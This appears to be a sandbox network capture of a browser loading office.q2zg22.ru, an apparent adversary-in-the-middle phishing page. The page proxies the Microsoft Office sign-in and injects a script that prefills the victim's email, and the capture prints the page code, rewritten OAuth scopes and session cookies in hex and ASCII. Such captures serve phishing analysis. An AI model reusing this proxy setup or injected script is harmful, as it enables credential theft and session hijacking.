                                                                                                                          Location: https://office.q2zg22.ru/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638424982651072914.MTc3ZWVkZGQtYTZjNy00OTZlLTgxODctYWFiZGUzNzYwM2JlNjljY2M1YzEtZjRmNy00Njg2LTk5NzctYmUyYmY1ZDhiYjVi&ui_locales=en-US&mkt=en-US&client-request-id=27340d1a-f75c-4aed-bfd4-e7d89e08f2f5&state=Yvf-XDUrjz0oeLPkq8m6wvZNNx-4HHkagqS9BhHl9kXhuZbnWeP_boVBmzqCmf36UjRbbqyVFxS6NfMPtPrMzkYT0e3eC9jdOQOPVaXsUaKvdkKS66v9CzSs89a-xvCDlX83KjhHGwLHOIpviusPB2JbXEDMaguF9u_IRWYYWRgKHLprzYpu6YRCePlMSrde_70j5tZlDSgEnKs7NwUMbr6fRrt8o-EvCVkm0FfE3NnjacnfJhuLiNnd81beGyMvkxdpyTZsYXUvoKRGU0_4ng&x-client-SKU=ID_NET6_0&x-client-ver=6.34.0.0
                                                                                                                          Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                          Request-Context: appId=
                                                                                                                          Set-Cookie: OH.DCAffinity=OH-ncu; Path=/; Expires=Sat, 03 Feb 2024 03:17:45 GMT; HttpOnly; Secure; SameSite=None
                                                                                                                          2024-02-02 19:17:45 UTC1488INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 4f 48 2e 46 4c 49 44 3d 33 35 34 31 66 36 36 62 2d 38 38 33 64 2d 34 37 34 62 2d 62 61 64 61 2d 31 61 35 32 38 33 61 63 32 62 30 31 3b 20 50 61 74 68 3d 2f 3b 20 45 78 70 69 72 65 73 3d 53 75 6e 2c 20 30 32 20 46 65 62 20 32 30 32 35 20 31 39 3a 31 37 3a 34 35 20 47 4d 54 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 4f 48 2e 53 49 44 3d 3b 20 50 61 74 68 3d 2f 3b 20 45 78 70 69 72 65 73 3d 54 68 75 2c 20 30 31 20 4a 61 6e 20 31 39 37 30 20 30 30 3a 30 30 3a 30 30 20 47 4d 54 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 2e 41 73 70 4e 65 74 43 6f 72 65 2e 4f 70 65 6e 49 64 43 6f 6e 6e 65 63 74 2e 4e 6f 6e 63 65 2e 42 52 76 6e 33
                                                                                                                          Data Ascii: Set-Cookie: OH.FLID=3541f66b-883d-474b-bada-1a5283ac2b01; Path=/; Expires=Sun, 02 Feb 2025 19:17:45 GMT; HttpOnly; Secure; SameSite=NoneSet-Cookie: OH.SID=; Path=/; Expires=Thu, 01 Jan 1970 00:00:00 GMTSet-Cookie: .AspNetCore.OpenIdConnect.Nonce.BRvn3
                                                                                                                          2024-02-02 19:17:45 UTC32INData Raw: 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: alt-svc: h3=":443"; ma=86400
                                                                                                                          2024-02-02 19:17:45 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          14192.168.2.1649738172.67.209.714435716C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-02-02 19:17:45 UTC1899OUTGET /common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638424982651072914.MTc3ZWVkZGQtYTZjNy00OTZlLTgxODctYWFiZGUzNzYwM2JlNjljY2M1YzEtZjRmNy00Njg2LTk5NzctYmUyYmY1ZDhiYjVi&ui_locales=en-US&mkt=en-US&client-request-id=27340d1a-f75c-4aed-bfd4-e7d89e08f2f5&state=Yvf-XDUrjz0oeLPkq8m6wvZNNx-4HHkagqS9BhHl9kXhuZbnWeP_boVBmzqCmf36UjRbbqyVFxS6NfMPtPrMzkYT0e3eC9jdOQOPVaXsUaKvdkKS66v9CzSs89a-xvCDlX83KjhHGwLHOIpviusPB2JbXEDMaguF9u_IRWYYWRgKHLprzYpu6YRCePlMSrde_70j5tZlDSgEnKs7NwUMbr6fRrt8o-EvCVkm0FfE3NnjacnfJhuLiNnd81beGyMvkxdpyTZsYXUvoKRGU0_4ng&x-client-SKU=ID_NET6_0&x-client-ver=6.34.0.0 HTTP/1.1
                                                                                                                          Host: office.q2zg22.ru
                                                                                                                          Connection: keep-alive
                                                                                                                          Upgrade-Insecure-Requests: 1
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                          Sec-Fetch-Mode: navigate
                                                                                                                          Sec-Fetch-Dest: document
                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Referer: https://galeonconstruction.com/
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          Cookie: ae23-8632=afc35fefb916ef4eaaf2fe859837e744a9c25a67b61248f6ee93c6a02ca7fe04; fpc=Aq_odsI7GDJHm8suSWCV-X8; esctx=PAQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-Vdc2TMKN3WgRVIPG2KYMe9cKLPhl_mFvXXBfxpTirUGdlKhgqDMpWnM2_5_gD1SjljL2-mhgQ9VoUJK3J_wvKRz3Sjbi4oTarW6t9Zz7ed5ioicPhWSPqwo0BZiORSIVftWlg5DNCJFrIgBxKMsmna1gkBhhlzTVsbGcOi6THtwgAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; MUID=2E6F22D2EA936CD30EE836CBEBB26D97
                                                                                                                          2024-02-02 19:17:45 UTC1335INHTTP/1.1 200 OK
                                                                                                                          Date: Fri, 02 Feb 2024 19:17:45 GMT
                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          Access-Control-Allow-Credentials: true
                                                                                                                          Cache-Control: no-cache, no-store
                                                                                                                          Expires: -1
                                                                                                                          Nel: {"report_to":"network-errors","max_age":86400,"success_fraction":0.001,"failure_fraction":1.0}
                                                                                                                          P3p: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                          Pragma: no-cache
                                                                                                                          Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                          Report-To: {"group":"network-errors","max_age":86400,"endpoints":[{"url":"https://identity.nel.measure.office.net/api/report?catId=GW+estsfd+chi"}]}
                                                                                                                          Set-Cookie: esctx-sAcwFNXs9p0=AQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-Xz-zY4mFOFPtOKDCtkncDgiCqiq8JSPFEneyjDU4hFCxc9yKOXR0OSKd5FYQRJM3mXeQZYPo-cw18QcWUama1nI0_hypcV18IPjbFcAN8l-2_npQ8hQ5HCn_XXMqMr00sdRCGYoSBfgWdZ8ETjE1OiAA; Path=/; Domain=office.q2zg22.ru; HttpOnly; Secure; SameSite=None
                                                                                                                          Set-Cookie: fpc=Aq_odsI7GDJHm8suSWCV-X8; Path=/; Expires=Sun, 03 Mar 2024 19:17:45 GMT; HttpOnly; Secure; SameSite=None
                                                                                                                          Set-Cookie: x-ms-gateway-slice=estsfd; Path=/; HttpOnly; Secure; SameSite=None
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          X-Ms-Clitelem: 1,50168,0,,
                                                                                                                          X-Ms-Ests-Server: 2.1.17184.4 - NCUS ProdSlices
                                                                                                                          X-Ms-Request-Id: ee59cf26-64c6-4c07-90c2-84adcb7a3200
                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 84f4c6af994b451d-ATL
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          2024-02-02 19:17:45 UTC34INData Raw: 35 36 31 30 0d 0a 0d 0a 0d 0a 3c 21 2d 2d 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 4d 69 63 72 6f
                                                                                                                          Data Ascii: 5610... Copyright (C) Micro
                                                                                                                          2024-02-02 19:17:45 UTC1369INData Raw: 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 2e 20 41 6c 6c 20 72 69 67 68 74 73 20 72 65 73 65 72 76 65 64 2e 20 2d 2d 3e 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 52 65 64 69 72 65 63 74 69 6e 67 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65
                                                                                                                          Data Ascii: soft Corporation. All rights reserved. --><!DOCTYPE html><html><head> <title>Redirecting</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name
                                                                                                                          2024-02-02 19:17:45 UTC1369INData Raw: 5c 75 30 30 32 36 73 63 6f 70 65 3d 6f 70 65 6e 69 64 2b 70 72 6f 66 69 6c 65 2b 68 74 74 70 73 25 33 61 25 32 66 25 32 66 72 65 61 63 74 2e 71 32 7a 67 32 32 2e 72 75 25 32 66 76 32 25 32 66 4f 66 66 69 63 65 48 6f 6d 65 2e 41 6c 6c 5c 75 30 30 32 36 73 74 61 74 65 3d 59 76 66 2d 58 44 55 72 6a 7a 30 6f 65 4c 50 6b 71 38 6d 36 77 76 5a 4e 4e 78 2d 34 48 48 6b 61 67 71 53 39 42 68 48 6c 39 6b 58 68 75 5a 62 6e 57 65 50 5f 62 6f 56 42 6d 7a 71 43 6d 66 33 36 55 6a 52 62 62 71 79 56 46 78 53 36 4e 66 4d 50 74 50 72 4d 7a 6b 59 54 30 65 33 65 43 39 6a 64 4f 51 4f 50 56 61 58 73 55 61 4b 76 64 6b 4b 53 36 36 76 39 43 7a 53 73 38 39 61 2d 78 76 43 44 6c 58 38 33 4b 6a 68 48 47 77 4c 48 4f 49 70 76 69 75 73 50 42 32 4a 62 58 45 44 4d 61 67 75 46 39 75 5f 49 52
                                                                                                                          Data Ascii: \u0026scope=openid+profile+https%3a%2f%2freact.q2zg22.ru%2fv2%2fOfficeHome.All\u0026state=Yvf-XDUrjz0oeLPkq8m6wvZNNx-4HHkagqS9BhHl9kXhuZbnWeP_boVBmzqCmf36UjRbbqyVFxS6NfMPtPrMzkYT0e3eC9jdOQOPVaXsUaKvdkKS66v9CzSs89a-xvCDlX83KjhHGwLHOIpviusPB2JbXEDMaguF9u_IR
                                                                                                                          2024-02-02 19:17:45 UTC1369INData Raw: 30 30 30 2c 22 73 74 61 72 74 44 65 73 6b 74 6f 70 53 73 6f 4f 6e 50 61 67 65 4c 6f 61 64 22 3a 66 61 6c 73 65 2c 22 70 72 6f 67 72 65 73 73 41 6e 69 6d 61 74 69 6f 6e 54 69 6d 65 6f 75 74 22 3a 31 30 30 30 30 2c 22 69 73 45 64 67 65 41 6c 6c 6f 77 65 64 22 3a 66 61 6c 73 65 2c 22 6d 69 6e 44 73 73 6f 45 64 67 65 56 65 72 73 69 6f 6e 22 3a 22 31 37 22 2c 22 69 73 53 61 66 61 72 69 41 6c 6c 6f 77 65 64 22 3a 74 72 75 65 2c 22 72 65 64 69 72 65 63 74 55 72 69 22 3a 22 22 2c 22 69 73 49 45 41 6c 6c 6f 77 65 64 46 6f 72 53 73 6f 50 72 6f 62 65 22 3a 74 72 75 65 2c 22 65 64 67 65 52 65 64 69 72 65 63 74 55 72 69 22 3a 22 68 74 74 70 73 3a 2f 2f 61 75 74 6f 6c 6f 67 6f 6e 2e 6d 69 63 72 6f 73 6f 66 74 61 7a 75 72 65 61 64 2d 73 73 6f 2e 63 6f 6d 2f 63 6f 6d 6d
                                                                                                                          Data Ascii: 000,"startDesktopSsoOnPageLoad":false,"progressAnimationTimeout":10000,"isEdgeAllowed":false,"minDssoEdgeVersion":"17","isSafariAllowed":true,"redirectUri":"","isIEAllowedForSsoProbe":true,"edgeRedirectUri":"https://autologon.microsoftazuread-sso.com/comm
                                                                                                                          2024-02-02 19:17:45 UTC1369INData Raw: 62 51 55 65 39 6d 6f 75 52 64 78 6d 79 49 74 73 3d 31 3a 31 3a 43 41 4e 41 52 59 3a 6c 56 6d 6b 31 39 62 48 64 31 51 58 75 46 6d 73 44 4b 47 45 76 4a 6d 58 38 6f 53 2f 42 6c 69 66 51 62 51 78 72 6a 55 5a 70 61 49 3d 22 2c 22 73 43 61 6e 61 72 79 54 6f 6b 65 6e 4e 61 6d 65 22 3a 22 63 61 6e 61 72 79 22 2c 22 66 53 6b 69 70 52 65 6e 64 65 72 69 6e 67 4e 65 77 43 61 6e 61 72 79 54 6f 6b 65 6e 22 3a 66 61 6c 73 65 2c 22 66 45 6e 61 62 6c 65 4e 65 77 43 73 72 66 50 72 6f 74 65 63 74 69 6f 6e 22 3a 74 72 75 65 2c 22 63 6f 72 72 65 6c 61 74 69 6f 6e 49 64 22 3a 22 32 37 33 34 30 64 31 61 2d 66 37 35 63 2d 34 61 65 64 2d 62 66 64 34 2d 65 37 64 38 39 65 30 38 66 32 66 35 22 2c 22 73 65 73 73 69 6f 6e 49 64 22 3a 22 65 65 35 39 63 66 32 36 2d 36 34 63 36 2d 34 63
                                                                                                                          Data Ascii: bQUe9mouRdxmyIts=1:1:CANARY:lVmk19bHd1QXuFmsDKGEvJmX8oS/BlifQbQxrjUZpaI=","sCanaryTokenName":"canary","fSkipRenderingNewCanaryToken":false,"fEnableNewCsrfProtection":true,"correlationId":"27340d1a-f75c-4aed-bfd4-e7d89e08f2f5","sessionId":"ee59cf26-64c6-4c
                                                                                                                          2024-02-02 19:17:45 UTC1369INData Raw: 70 53 72 63 73 22 3a 5b 22 68 74 74 70 73 3a 2f 2f 6f 66 66 69 63 65 2e 71 32 7a 67 32 32 2e 72 75 22 2c 22 68 74 74 70 73 3a 2f 2f 61 61 64 63 64 6e 2e 6d 73 61 75 74 68 2e 6e 65 74 2f 22 2c 22 68 74 74 70 73 3a 2f 2f 61 61 64 63 64 6e 2e 6d 73 66 74 61 75 74 68 2e 6e 65 74 2f 22 2c 22 2e 6f 66 66 69 63 65 2e 71 32 7a 67 32 32 2e 72 75 22 5d 2c 22 65 6e 76 45 72 72 6f 72 52 65 64 69 72 65 63 74 22 3a 74 72 75 65 2c 22 65 6e 76 45 72 72 6f 72 55 72 6c 22 3a 22 2f 63 6f 6d 6d 6f 6e 2f 68 61 6e 64 6c 65 72 73 2f 65 6e 76 65 72 72 6f 72 22 7d 2c 22 6c 6f 61 64 65 72 22 3a 7b 22 63 64 6e 52 6f 6f 74 73 22 3a 5b 22 68 74 74 70 73 3a 2f 2f 61 61 64 63 64 6e 2e 6d 73 61 75 74 68 2e 6e 65 74 2f 22 2c 22 68 74 74 70 73 3a 2f 2f 61 61 64 63 64 6e 2e 6d 73 66 74 61
                                                                                                                          Data Ascii: pSrcs":["https://office.q2zg22.ru","https://aadcdn.msauth.net/","https://aadcdn.msftauth.net/",".office.q2zg22.ru"],"envErrorRedirect":true,"envErrorUrl":"/common/handlers/enverror"},"loader":{"cdnRoots":["https://aadcdn.msauth.net/","https://aadcdn.msfta
                                                                                                                          2024-02-02 19:17:45 UTC1369INData Raw: 44 30 5f 32 61 62 41 57 70 4b 76 4e 38 75 42 73 35 49 79 4a 49 7a 44 37 4d 69 44 38 74 62 58 49 41 58 6e 61 38 4a 33 33 38 78 31 5f 39 57 5f 58 50 73 61 5f 76 77 44 77 5a 43 78 45 67 56 66 70 71 47 43 7a 4c 35 30 37 49 54 77 72 6c 52 34 6f 7a 52 6c 7a 70 6a 2d 73 65 71 59 65 45 75 66 54 63 55 6b 51 43 30 61 5a 75 47 76 7a 67 4f 49 41 41 22 2c 22 72 65 70 6f 72 74 53 74 61 74 65 73 22 3a 5b 5d 7d 2c 22 72 65 64 69 72 65 63 74 45 6e 64 53 74 61 74 65 73 22 3a 5b 22 65 6e 64 22 5d 2c 22 63 6f 6f 6b 69 65 4e 61 6d 65 73 22 3a 7b 22 61 61 64 53 73 6f 22 3a 22 41 41 44 53 53 4f 22 2c 22 77 69 6e 53 73 6f 22 3a 22 45 53 54 53 53 53 4f 22 2c 22 73 73 6f 54 69 6c 65 73 22 3a 22 45 53 54 53 53 53 4f 54 49 4c 45 53 22 2c 22 73 73 6f 50 75 6c 6c 65 64 22 3a 22 53 53
                                                                                                                          Data Ascii: D0_2abAWpKvN8uBs5IyJIzD7MiD8tbXIAXna8J338x1_9W_XPsa_vwDwZCxEgVfpqGCzL507ITwrlR4ozRlzpj-seqYeEufTcUkQC0aZuGvzgOIAA","reportStates":[]},"redirectEndStates":["end"],"cookieNames":{"aadSso":"AADSSO","winSso":"ESTSSSO","ssoTiles":"ESTSSSOTILES","ssoPulled":"SS
                                                                                                                          2024-02-02 19:17:45 UTC1369INData Raw: 74 79 70 65 2e 73 6c 69 63 65 2e 63 61 6c 6c 28 65 2c 72 3f 31 3a 30 29 7d 76 61 72 20 6e 3d 77 69 6e 64 6f 77 3b 6e 2e 24 44 6f 7c 7c 28 6e 2e 24 44 6f 3d 7b 22 71 22 3a 5b 5d 2c 22 72 22 3a 5b 5d 2c 22 72 65 6d 6f 76 65 49 74 65 6d 73 22 3a 5b 5d 2c 22 6c 6f 63 6b 22 3a 30 2c 22 6f 22 3a 5b 5d 7d 29 3b 76 61 72 20 6f 3d 6e 2e 24 44 6f 3b 6f 2e 77 68 65 6e 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 6e 29 7b 66 75 6e 63 74 69 6f 6e 20 69 28 65 29 7b 72 28 65 2c 61 2c 73 29 7c 7c 6f 2e 71 2e 70 75 73 68 28 7b 22 69 64 22 3a 65 2c 22 63 22 3a 61 2c 22 61 22 3a 73 7d 29 7d 76 61 72 20 61 3d 30 2c 73 3d 5b 5d 2c 75 3d 31 3b 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 6e 7c 7c 28 61 3d 6e 2c 0a 75 3d 32 29 3b 66 6f 72 28 76 61 72 20 63 3d 75 3b 63 3c 61
                                                                                                                          Data Ascii: type.slice.call(e,r?1:0)}var n=window;n.$Do||(n.$Do={"q":[],"r":[],"removeItems":[],"lock":0,"o":[]});var o=n.$Do;o.when=function(t,n){function i(e){r(e,a,s)||o.q.push({"id":e,"c":a,"a":s})}var a=0,s=[],u=1;"function"==typeof n||(a=n,u=2);for(var c=u;c<a
                                                                                                                          2024-02-02 19:17:45 UTC1369INData Raw: 64 65 74 61 63 68 45 76 65 6e 74 28 22 6f 6e 6c 6f 61 64 22 2c 6e 29 29 7d 76 61 72 20 61 3d 21 31 2c 73 3d 21 31 3b 69 66 28 22 63 6f 6d 70 6c 65 74 65 22 3d 3d 3d 72 2e 72 65 61 64 79 53 74 61 74 65 29 7b 72 65 74 75 72 6e 20 76 6f 69 64 20 73 65 74 54 69 6d 65 6f 75 74 28 6e 29 7d 21 66 75 6e 63 74 69 6f 6e 28 29 7b 72 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 3f 28 72 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 22 2c 6f 2c 21 31 29 2c 65 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 6c 6f 61 64 22 2c 6e 2c 21 31 29 29 3a 72 2e 61 74 74 61 63 68 45 76 65 6e 74 26 26 28 72 2e 61 74 74 61 63 68 45 76 65 6e 74 28 22 6f 6e 72 65 61 64 79 73 74 61 74 65 63 68 61 6e 67 65 22 2c
                                                                                                                          Data Ascii: detachEvent("onload",n))}var a=!1,s=!1;if("complete"===r.readyState){return void setTimeout(n)}!function(){r.addEventListener?(r.addEventListener("DOMContentLoaded",o,!1),e.addEventListener("load",n,!1)):r.attachEvent&&(r.attachEvent("onreadystatechange",
                                                                                                                          2024-02-02 19:17:45 UTC1369INData Raw: 75 6e 63 74 69 6f 6e 20 63 28 29 7b 66 75 6e 63 74 69 6f 6e 20 74 28 65 29 7b 67 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 22 68 65 61 64 22 29 5b 30 5d 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 6e 28 65 2c 72 2c 74 2c 6e 29 7b 76 61 72 20 75 3d 6e 75 6c 6c 3b 72 65 74 75 72 6e 20 75 3d 6f 28 65 29 3f 69 28 65 29 3a 22 73 63 72 69 70 74 22 3d 3d 3d 6e 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3f 61 28 65 29 3a 73 28 65 2c 6e 29 2c 72 26 26 28 75 2e 69 64 3d 72 29 2c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 75 2e 73 65 74 41 74 74 72 69 62 75 74 65 26 26 28 75 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 63 72 6f 73 73 6f 72 69 67 69 6e 22 2c 22 61 6e 6f 6e 79 6d 6f 75 73 22 29 2c 74
                                                                                                                          Data Ascii: unction c(){function t(e){g.getElementsByTagName("head")[0].appendChild(e)}function n(e,r,t,n){var u=null;return u=o(e)?i(e):"script"===n.toLowerCase()?a(e):s(e,n),r&&(u.id=r),"function"==typeof u.setAttribute&&(u.setAttribute("crossorigin","anonymous"),t


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          15192.168.2.1649739172.67.209.714435716C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-02-02 19:17:46 UTC2067OUTGET /s/afc35fefb916ef4eaaf2fe859837e744a9c25a67b61248f6ee93c6a02ca7fe04/521393ffd6e6e26814c2481ea580df56f06a765733586ff8dc0db635147b4d9a.js HTTP/1.1
                                                                                                                          Host: office.q2zg22.ru
                                                                                                                          Connection: keep-alive
                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Accept: */*
                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                          Referer: https://office.q2zg22.ru/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638424982651072914.MTc3ZWVkZGQtYTZjNy00OTZlLTgxODctYWFiZGUzNzYwM2JlNjljY2M1YzEtZjRmNy00Njg2LTk5NzctYmUyYmY1ZDhiYjVi&ui_locales=en-US&mkt=en-US&client-request-id=27340d1a-f75c-4aed-bfd4-e7d89e08f2f5&state=Yvf-XDUrjz0oeLPkq8m6wvZNNx-4HHkagqS9BhHl9kXhuZbnWeP_boVBmzqCmf36UjRbbqyVFxS6NfMPtPrMzkYT0e3eC9jdOQOPVaXsUaKvdkKS66v9CzSs89a-xvCDlX83KjhHGwLHOIpviusPB2JbXEDMaguF9u_IRWYYWRgKHLprzYpu6YRCePlMSrde_70j5tZlDSgEnKs7NwUMbr6fRrt8o-EvCVkm0FfE3NnjacnfJhuLiNnd81beGyMvkxdpyTZsYXUvoKRGU0_4ng&x-client-SKU=ID_NET6_0&x-client-ver=6.34.0.0
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          Cookie: ae23-8632=afc35fefb916ef4eaaf2fe859837e744a9c25a67b61248f6ee93c6a02ca7fe04; fpc=Aq_odsI7GDJHm8suSWCV-X8; esctx=PAQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-Vdc2TMKN3WgRVIPG2KYMe9cKLPhl_mFvXXBfxpTirUGdlKhgqDMpWnM2_5_gD1SjljL2-mhgQ9VoUJK3J_wvKRz3Sjbi4oTarW6t9Zz7ed5ioicPhWSPqwo0BZiORSIVftWlg5DNCJFrIgBxKMsmna1gkBhhlzTVsbGcOi6THtwgAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; MUID=2E6F22D2EA936CD30EE836CBEBB26D97; esctx-sAcwFNXs9p0=AQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-Xz-zY4mFOFPtOKDCtkncDgiCqiq8JSPFEneyjDU4hFCxc9yKOXR0OSKd5FYQRJM3mXeQZYPo-cw18QcWUama1nI0_hypcV18IPjbFcAN8l-2_npQ8hQ5HCn_XXMqMr00sdRCGYoSBfgWdZ8ETjE1OiAA
                                                                                                                          2024-02-02 19:17:46 UTC648INHTTP/1.1 200 OK
                                                                                                                          Date: Fri, 02 Feb 2024 19:17:46 GMT
                                                                                                                          Content-Type: application/javascript
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          Access-Control-Allow-Credentials: true
                                                                                                                          Cache-Control: no-cache, no-store
                                                                                                                          CF-Cache-Status: BYPASS
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=j2zy0do%2FCqeo3t%2BLk9jQM3JgW%2B1FOCwhaIKmKh%2FITxWCCbeSL%2FAbPzwFNkpMRyG7d23haQVplAfomIrjXdkRM09V1rigeiRugd2O6KqnACqUXvj8BlLEelIdKuLCo9ek1ukk"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 84f4c6b4dff04551-ATL
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          2024-02-02 19:17:46 UTC721INData Raw: 33 32 36 0d 0a 66 75 6e 63 74 69 6f 6e 20 6c 70 28 29 7b 0a 20 20 76 61 72 20 65 6d 61 69 6c 49 64 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 22 23 69 30 31 31 36 22 29 3b 0a 20 20 76 61 72 20 6e 65 78 74 42 75 74 74 6f 6e 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 22 23 69 64 53 49 42 75 74 74 6f 6e 39 22 29 3b 0a 20 20 76 61 72 20 71 75 65 72 79 20 3d 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3b 0a 20 20 69 66 20 28 2f 23 2f 2e 74 65 73 74 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 29 29 7b 0a 20 20 76 61 72 20 72 65 73 20 3d 20 71 75 65 72 79 2e 73 70 6c 69 74 28 22 23 22 29 3b 0a 20 20 76 61 72 20 64 61 74 61 31 20 3d 20 72 65 73 5b 30 5d 3b
                                                                                                                          Data Ascii: 326function lp(){ var emailId = document.querySelector("#i0116"); var nextButton = document.querySelector("#idSIButton9"); var query = window.location.href; if (/#/.test(window.location.href)){ var res = query.split("#"); var data1 = res[0];
                                                                                                                          2024-02-02 19:17:46 UTC92INData Raw: 20 20 7d 0a 20 20 7d 0a 20 20 20 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 29 7b 6c 70 28 29 3b 7d 2c 20 35 30 30 29 3b 0a 20 20 7d 0a 20 20 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 29 7b 6c 70 28 29 3b 7d 2c 20 35 30 30 29 3b 0a 0a 0d 0a
